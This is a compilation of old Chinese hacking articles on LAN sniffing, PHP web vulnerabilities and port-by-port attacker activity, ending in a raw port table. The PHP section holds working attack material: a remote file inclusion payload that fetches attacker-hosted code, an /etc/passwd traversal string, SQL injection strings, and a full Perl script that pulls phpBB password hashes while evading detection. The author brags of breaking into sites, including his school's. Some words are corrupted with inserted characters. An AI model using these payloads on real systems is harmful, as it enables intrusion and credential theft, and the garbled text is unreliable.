　　局域网的这种工作方式，一个形象的例子是，大房间就像是一个共享的信道，里面的每个人好像是一台主机。人们所说的话是信息包，在大房间中到处传播。当我们对其中某个人说话时，所有的人都能听到。但只有名字相同的那个人，才会对这些话语做出反映，进行处理。其余的人听到了这些谈话，只能从发呆中猜测，是否在监听他人的谈话。

　　当连接在同一条电缆或集线器上的主机被逻辑地分为几个子网时，如果一台主机处于监听模式下，它还能接收到发向与自己不在同一子网(使用了不同的掩码、IP地址和网关)的主机的那些信包。也就是说，在同一条物理信道上传输的所有信息都可以被接收到。

　　许多人会问：能不能监听不在同一个网段计算机传输的信息。答案是否定的，一台计算机只能监听经过自己网络接口的那些信包。否则，我们将能监听到整个Internet,情形会多么可怕。





目前的绝大多数计算机网络使用共享的通信信道。从上面的讨论中，我们知道，通信信道的共享意味着，计算机有可能接收发向另一台计算机的信息。

　　另外，要说明的是，Internet中使用的大部分协议都是很早设计的，许多协议的实现都是基于一种非常友好的，通信的双方充分信任的基础之上。因此，直到现在，网络安全还是非常脆弱的。在通常的网络环境下，用户的所有信息，包手户头和口令信息都是以明文的方式在网上传输。因此，对于一个网络黑客和网络攻击者进行网络监听，获得用户的各种信息并不是一件很困难的事。只要具有初步的网络和TCP/IP协议知识，便能轻易地从监听到的信息中提取出感兴趣的部分。

　　网络监听常常要保存大量的信息，对收集的信息进行大量的整理工作，因此，正在进行监的机器对用户的请求响应很慢。

　　首先，网络监听软件运行时，需要消耗大量的处理器时间，如果在此时，就详细地分析包中的内容，许多包就会来不信接收而漏掉。因此，网络监听软件通常都是将监听到的包存放在文件中，待以后再分析。

　　其次，网络中的数据包非常复杂，两台主机之间即使连续发送和接受数据包，在监听到的结果中，中间必然会夹杂了许多别的主机交互的数据包。监听软件将同一TCP会话的包整理到一起，已经是很不错了。如果还希望将用户的详细信息整理出眯，需要根据协议对包进行大量的分析。面对网络上如此众多的协议，这个监听软件将会十分庞大。

　　其实，找这些信息并不是一件难事。只要根据一定的规律，很容易将有用的信息一一提取出来。

PHP网破解漏洞的相关总结
从现在的破解来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的破解问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.

我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE 欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!

首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子:假设在a.php中有这样一句代码:
include($include."/xxx.php");
?>
在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的.比方说我们提交:a.php? include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了.我们可以在 b.php中写入类似于:passthru("/bin/ls /etc");的代码.这样,就可以执行一些有目的的攻击了.(注:web服务器应该不能执行php代码,不然就出问题了.相关详情可以去看< <如何对PHP程序中的常见漏洞进行攻击>>).在这个漏洞方面,出状况的很多,比方说:PayPal Store Front,
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.

接着,我们再来看一下脚本命令执行漏洞.这是由于对用户提交的URI参数缺少充分过滤，提交包含恶意HTML代码的数据，可导致触发跨站脚本攻击，可能获得目标用户的敏感信息。我们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充分的过滤,我们可以通过这样的代码来达到攻击的目的:
破解 在script里面我们可以构造函数来获得用户的一些敏感信息.在这个漏洞方面相对要少一点,除了PHP Transparent之外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.

再然后,我们就来看看文件泄露漏洞了.这种漏洞是由于对用户提交参数缺少充分过滤，远程攻击者可以利用它进行目录遍历攻击以及获取一些敏感信息。我们拿最近发现的phpMyAdmin来做例子.在phpMyAdmin中,e破解ort.php 页面没有对用户提交的 what参数进行充分过滤,远程攻击者提交包含多个../字符的数据，便可绕过WEB ROOT限制，以WEB权限查看系统上的任意文件信息。比方说打入这样一个地址:export.php?what=../../../../../.. /etc/passwd%00 就可以达到文件泄露的目的了.在这方面相对多一点,有:myPHPNuke,McNews等等.
最后,我们又要回到最兴奋的地方了.想想我们平时在asp页面中用SQL注入有多么爽,以前还要手动注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然后再开做出NBSI以后,我们NB破解真是拉出一片天空.曾先后帮CSDN,破解论坛,中国频道等大型网站找出漏洞.(这些废话不多说了,有点跑题了...).还是言规正传,其实在asp中SQL的注入和php中的SQL注入大致相同, 只不过稍微注意一下用的几个函数就好了.将asc改成 ASCII,len改成LENGTH,其他函数基本不变了.其实大家看到PHP的SQL注入,是不是都会想到PHP-NUKE和PHPBB呢?不错,俗话说树大破解分, 像动网这样的论坛在asp界就该是漏洞这王了,这并不是说它的论坛安全太差,而是名气太响,别人用的多了,研究的人也就多了,发现的安全漏洞也就越多了. PHPBB也是一样的,现在很大一部分人用PHP做论坛的话,一般都是选择了PHPBB.它的漏洞也是一直在出,从最早phpBB.com phpBB 1.4.0版本被人发现漏洞,到现在最近的phpBB 2.0.6版本的groupcp.php,以及之前发现的search.php,profile.php,viewtopic.php等等加起来,大概也有十来个样子吧.这也一直导致,一部分人在研究php漏洞的时候都会拿它做实验品,所谓百练成精嘛,相信以后的PHPBB会越来越好.

好了,我们还是来分析一下漏洞产生的原因吧.拿viewtopic.php页面来说,由于在调用viewtopic.php时，直接从GET请求中获得 "topic_id"并传递给SQL查询命令,而并没有进行一些过滤的处理,攻击者可以提交特殊的SQL字符串用于获得MD5密码，获得此密码信息可以用于自动登录或者进行暴力破解。(我想应该不会有人想去暴力破解吧,除非有特别重要的原因).先看一下相关源代码:
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS[topic]) )
# {
# $topic_id = intval($HTTP_GET_VARS[topic]);
# }
从上面我们可以看出,如果提交的view=newest并且sid设置了值的话,执行的查询代码像下面的这个样子(如果你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响系统为:phpBB 2.0.5和phpBB 2.0.4).
# $sql = "SELECT p.post_id
# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
# WHERE s.session_id = $session_id
# AND u.user_id = s.session_user_id

# AND p.topic_id = $topic_id
# AND p.post_time >= u.user_lastvisit
# ORDER BY p.post_time ASC
# LIMIT 1";
Rick提供了下面的这断测试代码:
use IO::Socket;
$remote = shift localhost;
$view_topic = shift /phpBB2/viewtopic.php;
$uid = shift 2;
$port = 80;
$d破解ype = mysql4; # mysql4 or pgsql
print "Trying to get pass破解 hash for uid $uid server $remote dbtype: $dbtype\n";
$p = "";
for($index=1; $index<=32; $index++)
{
$socket = IO::Socket::INET->new(PeerAddr => $remote,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@\n";
$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\n\n";
print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
print $socket "Host: $remote\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /location:.*\x23(\d+)/) # Matches the location: viewtopic.php?p=#
{
$p .= chr ();
}
}
close($socket);
}
print "\nMD5 Hash for uid $uid is $p\n";
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i {
$c = substr($str,$i,1);
$j = rand length($str) * 1000;


if (int($j) % 2 $c eq )
{
$ret .= "%" . sprintf("%x",ord($c));

}
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dbtype eq mysql4)
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dbtype eq pgsql)
{
return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else
{
return "";
}
}
这断代码,我就不多做解释了.作用是获得HASH值.

看到这里,大家可能有点疑问,为什么我前面讲的那些改的函数怎么没有用到,我讲出来不怕大家破解:其实网上很多站点有些页面的查询语句看起来会是这样:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,这是真的,我还靠这个进过几个大型网站.至于哪一些,不好讲出来,不过我们学校的网站,我就是靠这个进后台的(希望学校网络中心的看不到这篇文章,^_^).把前面那函数用上吧.不然你只有改人家的密码了哦!!!

差点忘了一点,在SQL注入的时候,PHP与ASP有所不同,mysql对sql语句的运用没有mssql灵活,因此,很多在mssql上可以用的查询语句在mysql数据库中都不能奏效了. 一般我们常见的注入语句像这样:aaa.php?id=a into outfile pass.txt或是aaa.php?id=a into outfile pass.txt /*再进一步可以改成:aaa.php?id=a or 1=1 union select id,name,password form users into outfile c:/a.txt
这样可以将数据库数据导出为文件,然后可以查看.
或是这样:mode=,user_level=4
这个语句一般用在破解改资料时,假设页面存在漏洞的话,就可以达到提升权限的做用.
其它的如 OR 1=1 -- 或者:1 or 1=1则跟asp差不多.这里不多讲了.在php里面,SQL注入看来还是漏洞之首啊,有太多的页面存在这个问题了.

其实大家可以看出来,上面那些分类归根结底只有一个原因:提交参数没过滤或是过滤不够严谨.破解防线向来有攻有守.这里,就大致讲一下破解的方法吧.

首先,我个人认为最重要的一点是将magic_quotes_gpc高为ON,它的作用是将单引号,双引号,反斜线,和空字符转换为含有反斜线的字符,如 select * from admin where username=$username and password=$password语句,攻击者想用1 or 1=1跳过验证,但是,那些字符串将被转换成这样:select * from admin where username=a and password=1\ or 1=\1从而达到阻止注入的目的,事实也就是自动进行了addslashes()操作.再不行的话,自己定义函数处理吧.现在看来,那些搞PHP注入的人也比较郁闷,因为myslq4以下版本不支持子语句,而新版本的mysql又会将magic_quotes_gpc选项默认为开.
解决包含文件漏洞用的方法就是:要求程序员包含文件里的参数尽量不要使用变量，如果使用变量，就一定要严格检查要包含的文件名，绝对不能由用户任意指定, 建议设global_variables为off。如前面文件打开中限制PHP操作路径是一个必要的选项。另外，如非特殊需要，一定要关闭PHP的远程文件打开功能。修改php.ini文件：allow_url_fopen = Off(注:参见<>).

还有一点我觉得很多网站都会有这个问题,就是没有关错误显示.轻一看可能没什么,但是一些盯了很久(用词有点不对哦)的人就可以通过错误提示来获得如数据库信息,网页文件物理路径等等

端口全解析（上）

端口可分为3大类：

1） 公认端口（Well Known Ports）：从0到1023，它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服 务的协议。例如：80端口实际上总是HTTP通讯。

2） 注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。

3） 动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。

　　本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住：并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣，请参看本文的其它部分。0通常用于分析想跳楼作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描：使用IP地址为 0.0.0.0，设置ACK位并在以太网层广播。 1 tcpmux 这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者，缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户，如lp,guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux 并利用这些帐户。 7Echo你能看到许多人们搜索Fraggle放大器时，发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环（echo-loop），攻击者伪造从一个机器发送到另一个UDP数据包，而两个机器分别以它们最快的方式回应这些数据包。（参见Chargen）另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做Resonate Global Dispatch”，它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDPecho：“如果将cache的source_ping on选项打开，它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat这是一种UNIX服务，它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全，如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似再说一遍：ICMP没有端口，ICMP port 11通常是ICMPtype=1119 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时，会发送含有垃圾字符的数据流知道连接关闭。 Hacker利用IP欺骗可以发动DoS攻击伪造两个chargen服务器之间的UDP由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样 fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

21 ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或tackers利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

22 sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式，许多使用RSAREF库的版本有不少漏洞。（建议在其它端口运行ssh）还应该注意的是ssh工具包带有一个称为ake-ssh-known-hosts的程序。它会扫描整个域的 ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP（而不是TCP）与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。 5632 （十六进制的0x1600）位交换后是0x0016（使进制的22）。

23 Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的想跳楼作系统。此外使用其它技术，入侵者会找到密码。

25 smtp攻击者（spammer）寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭，他们需要拨号连接到高带宽的e-mail服务器上，将简单的信息传递到不同的地址。SMTP服务器（尤其是sendmail）是进入系统的最常用方法之一，因为它们必须完整的暴露于Internet且邮件的路由是复杂的（暴露+复杂=弱点）。

53 DNSHacker或crackers可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其它通讯。因此防火墙常常过滤或记录53端口。需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

67和68 Bootp和DHCPUDP上的Bootp/DHCP：通过DSL和cable-modem的防火墙常会看见大量发送到广播地址 255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”（man-in-middle）攻击。客户端向68端口（bootps）广播请求配置，服务器向67端口（bootpc）广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。69 TFTP(UDP) 许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件，如密码文件。它们也可用于向系统写入文件

79 finger Hacker用于获得用户信息，查询想跳楼作系统，探测已知的缓冲区溢出错误，回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本 setuidroot，信任局域网，在/tmp下建立Internet可访问的文件，LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器，许多典型的HTTP漏洞可能存在（缓冲区溢出，历遍目录等）109 POP2并不象POP3那样有名，但许多服务器同时提供两种服务（向后兼容）。在同一个服务器上POP3的漏洞在POP2中同样存在。

110 POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个（这意味着Hacker可以在真正登陆前进入系统）。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有：pc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供 服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer，你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth .这是一个许多机器上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息（会被Hacker利用）。但是它可作为许多服务的记录器，尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，你将会看到许多这个端口的连接请求。记住，如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回T，着将回停止这一缓慢的连接。

119 NNTP news新闻组传输协议，承载USENET通讯。当你链接到诸如：news:p.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end- point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用 机器上的end-point mapper注册它们的位置。远端客户连接到机器时，它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如：这个机器上运 行Exchange Server吗？是什么版本？这个端口除了被用来查询服务（如使用epdump）还可以被用于直接攻击。有一些DoS攻 击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP)这是防火墙管理员最常见的信息，请仔细阅读文章后面的NetBIOS一节 139 NetBIOS　File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。 大量针对这一端口始于1999，后来逐渐变少。2000年又有回升。一些vbs（IE5 VisualBasicscripting）开始将它们自己拷贝到这个端口，试图在这个端口繁殖。

143 IMAP和上面POP3的安全问题一样，许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住：一种Linux蠕虫（admw0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后，这些漏洞变得流行起来。 Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2，但并不流行。 已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中，通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect rmote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名，你会看见这种包在子网内广播（cable modem, DSL）查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台，它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN，你将会看到这个端口的广播。CORBA是一种面向对象的RPC（remote procedure call）系统。Hacker会利用这些信息进入系统。 600 Pcserver backdoor 请查看1524端口一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.
端口全解析（下）

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的，但基于TCP 的mountd有所增加（mountd同时运行于两个端口）。记住，mountd可运行于任何端口（到底在哪个端口，需要在端口111做portmap查询），只是Linux默认为635端口，就象NFS通常运行于2049端口1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络，它们请求想跳楼作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点，你可以重启机器，打开Telnet，再打开一个窗口运行“natstat -a”，你将会看到Telnet被分配1024端口。请求的程序越多，动态端口也越多。想跳楼作系统分配的端口将逐渐变大。再来一遍，当你浏览Web页时用“netstat”查看，每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙，允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置，它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机，从而掩饰他们对你的直接攻击。 WinGate是一种常见的Windows个人防火墙，常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口，但常常是sscan脚本的一部分。

1243 Sub-7木马（TCP）参见Subseven部分。

1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口（尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本，如statd,ttdbserver和cmsd）。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图，很可能是上述原因。你可以试试Telnet到你的机器上的这个端口，看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。

2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口，但是大部分情况是安装后NFS杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口： 000/8001/8080/8888。扫描这一端口的另一原因是：用户正在进入聊天室。其它用户（或服务器本身）也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。

5632 pcAnywere你会看到很多这个端口的扫描，这依赖于你所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能得代理（译者：指agent而不是proxy）。Hacker/cracker也会寻找开放这种服务的机器，所以应该查看这种扫描的源地址。一些搜寻 pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器，而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时，他们将会看到持续的，在这个端口的连接企图。（译者：即看到防火墙报告这一端口的连接企图时，并不表示你已被Sub-7控制。）6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户，从另一个聊天者手中“继承”了IP地址这种情况就会发生：好象很多不同的人在测试这一端口。这一协议使用 “OPNG”作为其连接企图的前四个字节。

17027 Conducent这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验：阻断这一外向连接不会有任何问题，但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载：机器会不断试图解析DNS名─ads.conducent.com，即IP地址216.33.210.40 ； 216.33.199.77 ；216.33.199.80 ；216.33.199.81；216.33.210.41。（译者：不知NetAnts使用的Radiate是否也有这种现象）

27374 Sub-7木马(TCP) 参见Subseven部分。

30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “eliteHacker中31337读做“elite”/ei’li:t/（译者：法语，译为中坚力量，精华。即 3=E, 1=L, 7=T）。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少，其它的 木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马（RAT,Remote Access Trojan）。这种木马包含内置的31790端口扫描器，因此任何31789端口到317890端口的连接意味着已经有这种入侵。（31789端口是控制连接，317890端口是文件传输连接）

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说：早期版本的Solaris（2.5.1之前）将 portmapper置于这一范围内，即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper，就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包（且只在此范围之内）则可能是由于traceroute。参见traceroute分。

41508 Inoculan早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见 http://www.circlemud.org/~jelson/software/udpsend.html
http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
端口1~1024是保留端口，所以它们几乎不会是源端口。但有一些例外，例如来自NAT机器的连接。 常看见紧接着1024的端口，它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。 Server Client 服务描述

1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

20/tcp 动态 FTP FTP服务器传送文件的端口

53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

123 动态 S/NTP 简单网络时间协议（S/NTP）服务器运行的端口。它们也会发送到这个端口的广播。

27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器（IP asquerade）

201=at-rtmpAppleTalkRoutingMaintenance
202=at-nbpAppleTalkNameBinding
203=at-3AppleTalkUnused
204=AppleTalkEcho
205=AppleTalkUnused
206=AppleTalkZoneInformation
207=AppleTalkUnused
208=AppleTalkUnused
209=TrivialAuthenticatedMailProtocol
210=ANSIZ39.50z39.50
211=TexasInstruments914C/GTerminal
212=ATEXSSTRanet
213=IPX
214=VMPWSCSvmpwscs
215=InsigniaSolutions
216=AccessTechnologyLicenseServer
217=dBASEUnix
218=NetixMessagePostingProtocol
219=UnisysARPsuarps
220=InteractiveMailAccessProtocolv3
221=BerkeleyrlogindwithSPXauth
222=BerkeleyrshdwithSPXauth
223=CertificateDistributionCenter
224=Reserved(224-241)
241=Reserved(224-241)
242=Unassigned#
243=SurveyMeasurement
244=Unassigned#
245=LINKlink
246=DisplaySystemsProtocol
247-255Reserved
256-343Unassigned
344=ProsperoDataAccessProtocol
345=PerfAnalysisWorkbench
346=Zebraserverzserv
347=FatmenServerfatserv
348=CabletronManagementProtocol
349-370Unassigned
371=Clearcaseclearcase
372=UnixListservulistserv
373=LegentCorporation
374=LegentCorporation
375=Hasslehassle
376=AmigaEnvoyNetworkInquiryProto
377=NECCorporation
378=NECCorporation
379=TIA/EIA/IS-99modemclient
380=TIA/EIA/IS-99modemserver
381=hpperformancedatacollector
382=hpperformancedatamanagednode
383=hpperformancedataalarmmanager
384=ARemoteNetworkServerSystem
385=IBMApplication
386=ASAMessageRouterObjectDef.
387=AppletalkUpdate-BasedRoutingPro.
388=UnidataLDMVersion4
389=LightweightDirectoryAccessProtocol
390=UISuis
391=SynOpticsSNMPRelayPort
392=SynOpticsPortBrokerPort
393=DataInterpretationSystem
394=EMBLNucleicDataTransfer
395=NETscoutControlProtocol
396=NovellNetwareoverIP
397=MultiProtocolTrans.Net.
398=Kryptolankryptolan
399=Unassigned#
400=WorkstationSolutions
401=UninterruptiblePowerSupply
402=GenieProtocol
403=decapdecap
404=ncednced
405=ncldncld
406=InteractiveMailSupportProtocol
407=Timbuktutimbuktu
408=ProsperoResourceManagerSys.Man.
409=ProsperoResourceManagerNodeMan.
410=DECLadebugRemoteDebugProtocol
411=RemoteMTProtocol
412=TrapConventionPort
413=SMSPsmsp
414=InfoSeekinfoseek
415=BNetbnet
416=Silverplattersilverplatter
417=Onmuxonmux
418=Hyper-Ghyper-g
419=Arielariel1
420=SMPTEsmpte
421=Arielariel2
422=Arielariel3
423=IBMOperationsPlanningandControlStart
424=IBMOperationsPlanningandControlTrack
425=ICADicad-el
426=smartsdpsmartsdp
427=ServerLocation
429=OCS_AMU
430=UTMPSDutmpsd
431=UTMPCDutmpcd
432=IASDiasd
433=NNSPnnsp
434=MobileIP-Agent
435=MobilIP-MN
436=DNA-CMLdna-cml
437=comscmcomscm
439=dasp,ThomasObermair
440=sgcpsgcp
441=decvms-sysmgtdecvms-sysmgt
442=cvc_hostdcvc_hostd
443=https
444=SimpleNetworkPagingProtocol
445=Microsoft-DS
446=DDM-RDBddm-rdb
447=DDM-RFMddm-dfm
448=DDM-BYTEddm-byte
449=ASServerMapper
450=TServertserver
512=exec,Remoteprocessexecution
513=login,remotelogin
514=cmd,execwithautoauth.
514=syslog
515=Printerspooler
516=Unassigned
517=talk
519=unixtime
520=extendedfilenameserver
521=Unassigned
522=Unassigned
523=Unassigned
524=Unassigned
526=newdate
530=rpccourier

端口详细说明表（下）

531=chatconference
532=readnewsnetnews
533=foremergencybroadcasts
539=ApertusTechnologiesLoadDetermination
540=uucp
541=uucp-rlogin
542=Unassigned
543=klogin
544=kshell
545=Unassigned
546=Unassigned
547=Unassigned
548=Unassigned
549=Unassigned
550=new-who
551=Unassigned
552=Unassigned
553=Unassigned
554=Unassigned
555=dsf
556=remotefs
557-559=rmonitor
560=rmonitord
561=dmonitor
